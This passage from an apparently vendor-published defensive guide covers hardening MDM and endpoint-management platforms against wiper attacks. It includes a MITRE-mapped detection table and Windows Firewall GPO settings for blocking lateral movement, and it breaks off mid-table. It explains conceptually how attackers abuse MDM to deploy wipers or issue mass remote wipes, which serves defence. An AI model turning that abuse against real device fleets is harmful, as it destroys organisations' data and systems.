center;"><span style="vertical-align: baseline; color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;">Table 10: Detection opportunities for protecting cloud infrastructure and resources</span></div></div> <div class="block-paragraph_advanced"><h4><span style="vertical-align: baseline;">Securing Endpoint and Mobile Device Management Platforms</span></h4> <p><span style="vertical-align: baseline;">Protecting endpoint and Mobile Device Management (MDM) platforms is crucial to ensuring the security and availability of devices used in support of operations. In the context of </span><a href="https://services.google.com/fh/files/misc/apt44-unearthing-sandworm.pdf" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">wiper</span></a><span style="vertical-align: baseline;"> and destructive-style attacks, these platforms represent the "keys to the kingdom" that threat actors can target to turn an organization’s own infrastructure against itself.</span></p> <p><strong style="vertical-align: baseline;">Force Multiplier:</strong><span style="vertical-align: baseline;"> MDM and endpoint management tools have the inherent ability to push configurations and scripts to enrolled and managed devices. If compromised, a threat actor can use these legitimate administrative platforms to deploy wiper malware or execute remote wipe commands simultaneously across the entire enterprise, achieving destruction in minutes.  </span></p> <p><span style="vertical-align: baseline;">Unlike ransomware, where data might be recoverable via decryption, wiper attacks aim for the permanent destruction of the Master Boot Record (MBR), GUID Partition Table (GPT), Master File Table (MFT), or overwrite the file system making endpoint devices inaccessible. </span></p> <h5><span style="vertical-align: baseline;">Proactive Hardening</span></h5> <p><span style="vertical-align: baseline;">Enforcing strong identity and network controls for securing the management plane can prevent an attacker from gaining access to endpoint and MDM platforms and abusing intended functionality (e.g., deploying wiper scripts or issuing  "Remote Wipe" or "Factory Reset" commands).</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Enforce strong authentication (e.g., phishing-resistant MFA, including FIDO2) for identities assigned privileged roles and functions.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Enforce session lifetimes, idle session timeouts and utilize device-bound session protection to protect against token replay attacks.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Require access policies and </span><a href="https://learn.microsoft.com/en-us/intune/intune-service/fundamentals/multi-admin-approval" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">multi-admin approval</span></a><span style="vertical-align: baseline;"> for authorization of specific actions. </span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Reduce long-standing administrative permissions and migrate to a Just-in-Time (JIT) or Just-Enough-Access (JEA) access model for privileged roles and actions.  </span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">For Microsoft Intune, leverage a combination of </span><a href="https://learn.microsoft.com/en-us/intune/intune-service/fundamentals/scope-tags" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">role-based access control (RBAC) and scope tags</span></a><span style="vertical-align: baseline;"> to reduce the blast radius and minimize the risk of compromised privileged identities being leveraged to impact a large scope of managed devices / endpoints. </span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Audit admin roles for anything including “Remote tasks/wipe/erase” permissions - and ensure these events are forwarded to a centralized SIEM. Additionally, reduce the scope of administrators that can perform these actions to the minimum required for business operations.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Reduce scope of API token permissions following the principle of least privilege. Remove or expire tokens after a period of inactivity. Rotate tokens on a regular basis.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">For cloud-hosted MDM platforms, utilize access policies to enforce network- and location-based allow listing. For local/on-premises MDM servers, utilize firewalls to restrict access to MDM infrastructure (management plane).</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">If supported, configure wipe protection to prevent against mass device wiping within a specific threshold.  An example of this configuration within the Omnissa Workspace ONE platform is available </span><a href="https://docs.omnissa.com/bundle/WorkspaceONE-UEM-Managing-DevicesV2406/page/WipeProtection.html" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">here</span></a><span style="vertical-align: baseline;">.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Review existing scripts and configuration profiles deployed via the MDM platform to identify and remediate any hardcoded plain text passwords, API keys, or other sensitive secrets.</span></p> </li> </ul> <h4><span style="vertical-align: baseline;">Detection Opportunities for Securing Endpoint and Mobile Device Management Platforms</span></h4></div> <div class="block-paragraph_advanced"><div align="left"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table><colgroup><col/><col/><col/></colgroup> <tbody> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Use Case</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">MITRE ID</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Description</strong></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Remote Wipe or Factory Reset Command Issued</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><a href="https://attack.mitre.org/techniques/T1485/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">T1485 - Data Destruction</span></a></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Monitor endpoint management platform audit logs for issuance of remote wipe, factory reset, or retire commands. </span></p> <p><span style="vertical-align: baseline;">Alert on any wipe command targeting more than a threshold number of devices within a defined time window, or wipe commands issued outside approved change windows.</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Anomalous MDM/EDR Administrator Authentication</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><a href="https://attack.mitre.org/techniques/T1078/004/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">T1078.004 - Valid accounts: Cloud accounts</span></a></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Monitor authentication logs for endpoint management platform admin consoles for sign-ins from unrecognized IPs, non-compliant devices, or locations inconsistent with the administrator’s historical access pattern. </span></p> <p><span style="vertical-align: baseline;">Alert on admin authentication that bypasses Conditional Access or lacks phishing-resistant MFA.</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Bulk Script or Configuration Profile Deployment</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><a href="https://attack.mitre.org/techniques/T1072/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">T1072 - Software Deployment Tools</span></a></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Monitor of mass deployment of new scripts, configuration profiles, or software packages pushed to device groups via the management platform.</span></p> <p><span style="vertical-align: baseline;"> Alert when a deployment targets all devices or broad scope tags rather than specific groups, particularly when initiated by an account that has not previously performed bulk deployments.</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Administrative Role or Permission Modification</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><a href="https://attack.mitre.org/techniques/T1098/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">T1098 - Account Manipulation</span></a></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Monitor platform audit logs for changes to administrative roles, RBAC assignments, or scope tag modifications.</span></p> <p><span style="vertical-align: baseline;"> Alert on elevation of accounts to roles with remote task, wipe, or retire permissions, and on removal of multi-admin approval requirements.</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">API Key creation or Anomalous API access</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><a href="https://attack.mitre.org/techniques/T1098/001/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">T1098.001 - Additional Cloud Credentials</span></a></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Monitor for creation of new API keys, tokens, or service principal credentials for the endpoint management platform. </span></p> <p><span style="vertical-align: baseline;">Alert on API calls from previously unseen source IPs or user-agents, and on API activity outside business hours. </span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Management Platform Audit Log Tampering or Disablement</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><a href="https://attack.mitre.org/techniques/T1562/008/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">T1562.008 - Impair Defenses: Disable or Modify Cloud Logs</span></a></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Monitor for modifications to the platform’s audit logging configuration, including disablement of change management logging, redirection of syslog export destinations, or deletion of audit log entries. </span></p> <p><span style="vertical-align: baseline;">Alert on changes to log retention settings or export configurations.</span></p> </td> </tr> </tbody> </table></div> </div> </div> </div> </div></div> <div class="block-paragraph_advanced"><h3><span style="vertical-align: baseline;">3. On-Premises Lateral Movement Protections</span></h3> <h4><span style="vertical-align: baseline;">Endpoint Hardening</span></h4> <h5><span style="vertical-align: baseline;">Windows Firewall Configurations</span></h5> <p><span style="vertical-align: baseline;">Once initial access to on-premises infrastructure is established, threat actors will conduct lateral movement to attempt to further expand the scope of access and persistence. To protect Windows endpoints from being accessed using common lateral movement techniques, a Windows Firewall policy can be configured to restrict the scope of communications permitted between endpoints within an environment. A Windows Firewall policy can be enforced locally or centrally as part of a Group Policy Object (GPO) configuration. At a minimum, the common ports and protocols leveraged for lateral movement that should be blocked between workstation-to-workstation and workstations to non-domain controllers and non-file servers include:</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">SMB (TCP/445, TCP/135, TCP/139)</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Remote Desktop Protocol (TCP/3389)</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Windows Remote Management (WinRM)/Remote PowerShell (TCP/80, TCP/5985, TCP/5986)</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Windows Management Instrumentation (WMI) (dynamic port range assigned through Distributed Component Object Model (DCOM))</span></p> </li> </ul> <p><span style="vertical-align: baseline;">Using a GPO (Figure 5), the settings listed in Table 11 can be configured for the Windows Firewall to control </span><strong style="vertical-align: baseline;">inbound</strong><span style="vertical-align: baseline;"> communications to endpoints in a managed environment. The referenced settings will effectively block all inbound connections for the </span><span style="font-style: italic; vertical-align: baseline;">Private</span><span style="vertical-align: baseline;"> and </span><span style="font-style: italic; vertical-align: baseline;">Public</span><span style="vertical-align: baseline;"> profiles, and for the </span><span style="font-style: italic; vertical-align: baseline;">Domain</span><span style="vertical-align: baseline;"> profile, only allow connections that do not match a predefined block rule. </span></p></div> <div class="block-paragraph_advanced"><div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table border="1" style="border-collapse: collapse; width: 99.9641%;"> <tbody> <tr> <td style="width: 98.1839%;"><span style="font-style: italic; vertical-align: baseline;">Computer Configuration &gt; Policies &gt; Windows Settings &gt; Security Settings &gt; Windows Firewall with Advanced Security</span></td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> <p style="text-align: center;"><span style="vertical-align: baseline; color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;">Figure 5: GPO path for creating Windows Firewall rules</span></p></div> <div class="block-paragraph_advanced"><div align="left"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table><colgroup><col/><col/><col/><col/><col/><col/><col/></colgroup> <tbody> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Profile Setting</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Firewall State</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Inbound Connections</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Log Dropped Packets</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Log Successful Connections</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Log File Path</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Log File Maximum Size (KB)</strong></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">On</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Allow</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Yes</span></p> </td> <td style="vertical-align: 